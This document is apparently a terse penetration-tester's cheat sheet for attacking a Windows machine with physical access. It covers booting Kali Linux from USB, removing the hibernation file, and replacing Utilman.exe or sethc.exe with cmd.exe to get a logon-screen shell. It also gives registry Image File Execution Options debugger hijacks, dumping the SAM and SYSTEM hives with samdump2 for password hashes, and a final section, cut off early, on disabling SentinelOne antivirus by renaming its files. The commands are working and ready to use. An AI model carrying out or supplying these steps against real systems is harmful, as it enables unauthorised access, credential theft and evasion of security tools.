USB Boot

Boot on a Kali Linux
The disk must not be encrypted
USB ports must be enabled in the BIOS. If not, is the BIOS password protected ?

BIOS - Master password

Hibernation issues

From Windows

shutdown /s /t 0

From Kali

ntfs-3g -o remove_hiberfile </dev/sdX> </path/to/mount>

Admin CLI

From Kali
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
WIN+U
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Hit SHIFT 5 times
From an open logon session
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f

SAM dump

cp <...>\Windows\System32\config\SYSTEM /tmp
cp <...>\Windows\System32\config\SAM /tmp
samdump2 /tmp/SYSTEM /tmp/SAM

Kill AV/EDR

Check the AV executables list

SentinelOne

C:\Program Files\SentinelOne...

Change extension to “.old”: